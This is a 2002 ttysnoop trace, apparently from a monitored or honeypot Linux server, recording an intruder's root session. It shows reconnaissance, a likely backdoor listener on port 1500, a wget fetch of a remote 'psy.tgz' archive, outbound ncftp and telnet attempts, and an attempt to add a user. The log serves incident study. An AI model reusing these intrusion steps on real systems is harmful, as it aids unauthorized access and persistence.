Fri Sep 20 03:43:38 HKT 2002 ================================ Here is the ttysnoop trace 3:44am up 43 days, 11:44, 1 user, load average: 0.08, 0.02, 0.01 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT muie pts/0 xx.xx.72.174 3:44am 0.00s 0.02s 0.02s -bash bash-2.04# lst -2 bash: lst: command not found bash-2.04# last -2 muie pts/0 xx.xx.72.174 Fri Sep 20 03:44 still logged in root pts/0 gateway Thu Sep 19 12:09 - 12:10 (00:00) wtmp begins Mon Sep 2 02:54:27 2002 bash-2.04# cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 6 model name : Celeron (Mendocino) stepping : 5 cpu MHz : 534.552 cache size : 128 KB fdiv_bug : no hlt_bug : no sep_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr bogomips : 1064.96 bash-2.04# cd /var bash-2.04# cd www bash-2.04# ls cgi-bin html icons nut-cgi-bin bash-2.04# cd htm; bash: cd: htm: No such file or directory bash-2.04# cd html bash-2.04# ls index.html manual poweredby.png bash-2.04# wget wget: missing URL Usage: wget [OPTION]... [URL]... Try `wget --help' for more options. bash-2.04# wget www.geocities.com/xxxxxxx/psy.tgz --03:47:04-- http://www.geocities.com:80/xxxxxxx/psy.tgz => `psy.tgz' Connecting to www.geocities.com:80... www.geocities.com: Host not found. bash-2.04# lsof COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME init 1 root cwd DIR 3,1 4096 2 / init 1 root rtd DIR 3,1 4096 2 / init 1 root txt REG 3,1 27452 536494 /sbin/init init 1 root mem REG 3,1 434945 390147 /lib/ld-2.1.92.so init 1 root mem REG 3,1 4776568 390154 /lib/libc-2.1.92.so init 1 root 0u unix 0xc3edba40 212 socket init 1 root 10u FIFO 3,1 178895 /dev/initctl kflushd 2 root cwd DIR 3,1 4096 2 / kflushd 2 root rtd DIR 3,1 4096 2 / kflushd 2 root 0u unix 0xc3edba40 212 socket .. .. .. bash-2.04# bash-2.04# bash-2.04# socklist type port inode uid pid fd name tcp 1500 99517 0 31872 3 number_cum tcp 22 99475 0 31855 4 sshd tcp 113 81495 99 527 11 identd tcp 1024 97261 29 401 8 rpc.statd tcp 80 833 0 26938 17 httpd tcp 443 832 0 26938 16 httpd tcp 587 704 0 654 5 sendmail tcp 25 703 0 654 4 sendmail tcp 515 646 0 606 5 lpd tcp 22 621 0 585 3 sshd tcp 514 609 0 570 22 xinetd tcp 513 608 0 570 21 xinetd tcp 512 607 0 570 20 xinetd tcp 995 606 0 570 19 xinetd tcp 98 604 0 570 17 xinetd tcp 901 603 0 570 16 xinetd tcp 23 601 0 570 14 xinetd tcp 110 600 0 570 13 xinetd tcp 109 599 0 570 12 xinetd tcp 993 598 0 570 11 xinetd tcp 143 597 0 570 10 xinetd tcp 79 595 0 570 8 xinetd tcp 21 594 0 570 7 xinetd tcp 10083 592 0 570 4 xinetd tcp 10082 591 0 570 3 xinetd raw 6 0 0 0 0 bash-2.04# ncftp -u ftp.home.ro Usage: ncftp [-u user] [ | ] Program version: NcFTP 3.0.1/448 March 27 2000, 04:39 PM Library version: LibNcFTP 3.0.1 (March 27, 2000) System: Linux porky.devel.redhat.com 2.2.5-22smp #1 SMP Wed Jun 2... This is a freeware program by Mike Gleason (ncftp@ncftp.com). Use ncftpget and ncftpput for command-line FTP. bash-2.04# ncftp -u simbol ftp.xxx.ro NcFTP 3.0.1 (March 27, 2000) by Mike Gleason (ncftp@ncftp.com). Resolving ftp.xx.ro... Unknown host "ftp.xx.ro". ncftp> by Thank you for using NcFTP. Ask your system administrator to try NcFTPd Server! http://www.ncftp.com bash-2.04# ncftp -u simbol.xxx.xxx.236.42 Usage: ncftp [-u user] [ | ] Program version: NcFTP 3.0.1/448 March 27 2000, 04:39 PM Library version: LibNcFTP 3.0.1 (March 27, 2000) System: Linux porky.devel.redhat.com 2.2.5-22smp #1 SMP Wed Jun 2... This is a freeware program by Mike Gleason (ncftp@ncftp.com). Use ncftpget and ncftpput for command-line FTP. bash-2.04# ncftp -u simbolxxx.xxx.236.42 Usage: ncftp [-u user] [ | ] Program version: NcFTP 3.0.1/448 March 27 2000, 04:39 PM Library version: LibNcFTP 3.0.1 (March 27, 2000) System: Linux porky.devel.redhat.com 2.2.5-22smp #1 SMP Wed Jun 2... This is a freeware program by Mike Gleason (ncftp@ncftp.com). Use ncftpget and ncftpput for command-line FTP. bash-2.04# ncftp -u xxx.xxx.236.42 Usage: ncftp [-u user] [ | ] Program version: NcFTP 3.0.1/448 March 27 2000, 04:39 PM Library version: LibNcFTP 3.0.1 (March 27, 2000) System: Linux porky.devel.redhat.com 2.2.5-22smp #1 SMP Wed Jun 2... This is a freeware program by Mike Gleason (ncftp@ncftp.com). Use ncftpget and ncftpput for command-line FTP. bash-2.04# ncftp -u simbolxxx.xxx .236.42 bash-2.04# ncftp -u simbol xxxx.xxxx.236.42 NcFTP 3.0.1 (March 27, 2000) by Mike Gleason (ncftp@ncftp.com). Connection attempt timed-out... Connection attempt timed-out. Connection attempt timed-out. Connection attempt canceled. bash-2.04# bash-2.04# /sbin/ipchains -L Chain input (policy ACCEPT): Chain forward (policy ACCEPT): Chain output (policy ACCEPT): bash-2.04# /sbin/iptables -L iptables v1.1.1: can't initialize iptables table `filter': iptables who? (do you need to insmod?) Perhaps iptables or your kernel needs to be upgraded. bash-2.04# hostname -i 127.0.0.1 bash-2.04# hostname pc11 bash-2.04# mkdir -p /home/muie bash-2.04# /sbin/adduser sex bash: /sbin/adduser: No such file or directory bash-2.04# telnet xxxx.xxx.77.8 12345 Trying xxx.xxx.77.8... bash-2.04# telnet xxx.xxx.77.8 12345 Trying xxx.xxx.77.8... bash-2.04# telnet xx.xx.77.8 12345 Trying xx.xx.77.8... bash-2.04#